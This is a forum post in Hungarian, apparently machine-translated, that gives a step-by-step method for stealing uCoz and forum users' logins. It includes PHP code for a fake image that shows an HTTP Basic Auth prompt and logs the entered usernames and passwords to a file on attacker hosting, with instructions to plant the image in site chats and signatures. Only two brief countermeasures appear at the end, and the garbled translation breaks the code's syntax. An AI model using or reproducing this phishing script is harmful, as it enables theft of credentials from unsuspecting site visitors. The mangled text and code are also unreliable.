Összegzés - beszélni, mint egy hack oldalon yukoz nemcsak py kutatási és védelem

És én nem találtam meg itt már tárgyalt, még Anton bizonyította ezt a támadást itt a fórumon, de ugyanazon csapkod. forrás rábukkantam egy érdekes Infa „off” a yukoz, de ezt a módszert lehet alkalmazni, hogy szinte minden fórumon.

Tehát részletesebben a következő példa yukoz (De lehet próbálni, és fórumokon, hozzátéve, a megadott képet az aláírás, vagy a post / beszélgetni például):

Először regisztrálni kell a tárhely php (pl nemzeni hotinger, ez nem számít).

A regisztráció után öntsük ftp script és a jogosultságokat 777 egy üres .txt fájlt, például. passwords.txt (itt küldjük felhasználó átmegy „pohakannogo” oldalon).

Ezután nyissa meg a notebook, hanem egy egyszerű jegyzettömb és írjuk be az alábbiakat:

header ( "Content-type: image / gif");
$ Image = ImageCreateFromGif (cool.gif ');
if (! $ _COOKIE [ 'belépés'])
$ Login = $ _SERVER [ 'PHP_AUTH_USER'];
$ Pass = $ _SERVER [ 'PHP_AUTH_PW'];
if (strlen ($ pass) <= 4 ||. $login )
Header ( 'HTTP / 1.1 401 Jogosulatlan');
Fejléc ( 'WWW-Authenticate: Basic realm = "uCoz külalakot"');
>
elseif ($ login)
setcookie ( 'belépés' md5 ($ pass).);
$ F = fopen ( 'passwords.txt' 'ab'.);
fwrite ($ f $ login "|||" $ pass "\ r \ n" ....);
fclose ($ f);
>
>
imagegif ($ image);
imagedestroy ($ image);
?>

Ha írni mindent - kivéve a fájl nevét válasz mosoly, majd módosítsa a kiterjesztést php és töltse ki a tárhely, mint smile.php (Ne felejtsük el, hogy a jogosultságokat vagy 777 755).

Most választhat olyan webhelyet yukozovsky bal yukozovskih oldalakat a szokásos módon, a többség joga mini-chat.

Így - indul zaregistiruytes helyén, akkor kell írni mini chat-belépés és írja be a következőt az üzenet szövegét:

Ezt követően, aki megy az oldalon jelenik meg, megjegyzések formájában, amely meg kell adnia a felhasználónevét és jelszavát. Tudni bejáratánál az oldalon ebben a formában jelenik meg megjegyzések is. És mégis, felhasználónevét és jelszavát ebben a formában fog otsylatsya passwords.txt egy üres fájlt, amit létrehozott a legelején, és öntjük ftp.

Is alkalmazható, fórumok és blogok lehetővé betét képeket a felek források!

védelmi módszereket:

1) letiltása betét Képek a harmadik féltől származó forrásokat;

2) Ellenőrizze a proxy képeket a szerverre.

Én vagyok az út, ha meg nem találja a témát, ha már itt tárgyalt, tegye meg ez a téma, hogy adjunk. információkat.